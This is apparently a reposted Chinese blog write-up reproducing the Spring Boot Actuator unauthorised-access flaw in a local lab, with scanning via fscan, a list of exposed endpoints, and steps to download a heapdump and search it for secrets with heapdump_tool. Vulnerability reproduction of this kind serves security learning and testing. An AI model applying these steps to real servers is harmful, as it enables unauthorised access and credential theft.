更新時(shí)間：2022.07.20

微信公眾號(hào)：烏鴉安全

1. 漏洞介紹

Spring Boot Actuator 模塊提供了生產(chǎn)級(jí)別的功能，比如健康檢查，審計(jì)，指標(biāo)收集，HTTP 跟蹤等，幫助監(jiān)控和管理Spring Boot 應(yīng)用。這個(gè)模塊是一個(gè)采集應(yīng)用內(nèi)部信息暴露給外部的模塊，上述的功能都可以通過(guò)HTTP 和 JMX 訪問(wèn)。（來(lái)源：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q）
Actuator是Spring Boot提供的應(yīng)用系統(tǒng)監(jiān)控的開(kāi)源框架。在攻防場(chǎng)景里經(jīng)常會(huì)遇到Actuator配置不當(dāng)?shù)那闆r，攻擊者可以直接下載heapdump堆轉(zhuǎn)儲(chǔ)文件，然后通過(guò)一些工具來(lái)分析heapdump文件，從而可進(jìn)一步獲取敏感信息。（來(lái)源：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q）

2. 漏洞環(huán)境搭建

搭建環(huán)境：windows10 + java1.8
可以直接按照命令進(jìn)行操作，但是在環(huán)境搭建中，可能會(huì)遇到一定的問(wèn)題：

git clone https://github.com/callicoder/spring-boot-actuator-demo.git
cd spring-boot-actuator-demo-master
mvn package
java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

mvn的安裝，可以百度下，比較容易。
執(zhí)行mvn package

此時(shí)出現(xiàn)報(bào)錯(cuò)：

因?yàn)槲覀兪褂玫臎](méi)有IDE，所以在這可以用這個(gè)方法：
https://blog.csdn.net/qq_39323945/article/details/125110368

其他的方法可能不是很合適。繼續(xù)編譯，等待一會(huì)之后，編譯成功：

然后啟動(dòng)環(huán)境：java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

訪問(wèn)當(dāng)前的ip信息：http://10.211.55.5:8080/

此時(shí)環(huán)境搭建完成。

3. 漏洞利用

3.1 漏洞發(fā)現(xiàn)

一般來(lái)說(shuō)，這種可以通過(guò)掃描工具發(fā)現(xiàn)漏洞，在這里可以用fscan來(lái)試試：
./fscan_darwin -h 10.211.55.5

在這里可以發(fā)現(xiàn)有兩個(gè)漏洞：

[+] http://10.211.55.5:8080 poc-yaml-springboot-env-unauth spring2
[+] http://10.211.55.5:8080 poc-yaml-spring-actuator-heapdump-file

3.2 利用方法

來(lái)源：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q
Actuator 存在兩個(gè)版本

1.x版本

/configprops # 顯示所有@ConfigurationProperties
/env # 公開(kāi) Spring 的ConfigurableEnvironment
/health # 顯示應(yīng)用程序運(yùn)行狀況信息
/httptrace # 顯示 HTTP 跟蹤信息
/metrics # 顯示當(dāng)前應(yīng)用程序的監(jiān)控指標(biāo)信息。
/mappings # 顯示所有@RequestMapping路徑的整理列表
/threaddump # 線程轉(zhuǎn)儲(chǔ)

/heapdump # 堆轉(zhuǎn)儲(chǔ)
/jolokia # JMX-HTTP橋,它提供了一種訪問(wèn)JMX beans的替代方法

2.x版本

/actuator/configprops # 顯示所有@ConfigurationProperties
/actuator/env # 公開(kāi) Spring 的ConfigurableEnvironment
/actuator/health # 顯示應(yīng)用程序運(yùn)行狀況信息
/actuator/httptrace # 顯示 HTTP 跟蹤信息
/actuator/metrics # 顯示當(dāng)前應(yīng)用程序的監(jiān)控指標(biāo)信息。
/actuator/mappings # 顯示所有@RequestMapping路徑的整理列表
/actuator/threaddump # 線程轉(zhuǎn)儲(chǔ)
/actuator/heapdump # 堆轉(zhuǎn)儲(chǔ)
/actuator/jolokia # JMX-HTTP橋,它提供了一種訪問(wèn)JMX beans的替代方法

3.2 springboot-env-unauth

公開(kāi) Spring 的ConfigurableEnvironment
http://10.211.55.5:8080/actuator/env

http://10.211.55.5:8080/actuator/configprops

2.3 spring-actuator-heapdump

其實(shí)在實(shí)戰(zhàn)中，最重要的就是heapdump文件，在這里文件里面理論上可以發(fā)現(xiàn)很多敏感的數(shù)據(jù)庫(kù)之類(lèi)的信息。
http://10.211.55.5:8080/actuator/heapdump
該文件可以直接下載到本地來(lái)，使用專(zhuān)業(yè)工具進(jìn)行解密；
專(zhuān)業(yè)工具地址：https://github.com/wyzxxz/heapdump_tool
使用方法：java -jar heapdump_tool.jar heapdump

在這里選擇1，然后搜索關(guān)鍵字：

當(dāng)然，在這個(gè)環(huán)境中，暫時(shí)沒(méi)有發(fā)現(xiàn)什么敏感信息，但是在實(shí)戰(zhàn)里面，有概率是可以發(fā)現(xiàn)敏感數(shù)據(jù)的：

4. 總結(jié)

關(guān)于其他的工具來(lái)獲取明文信息的，可以參考一下鏈接：
https://mp.weixin.qq.com/s/JKq4WxFKwh7IDIAqTKcTHw文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-415718.html

到了這里，關(guān)于Springboot Actuator未授權(quán)訪問(wèn)漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！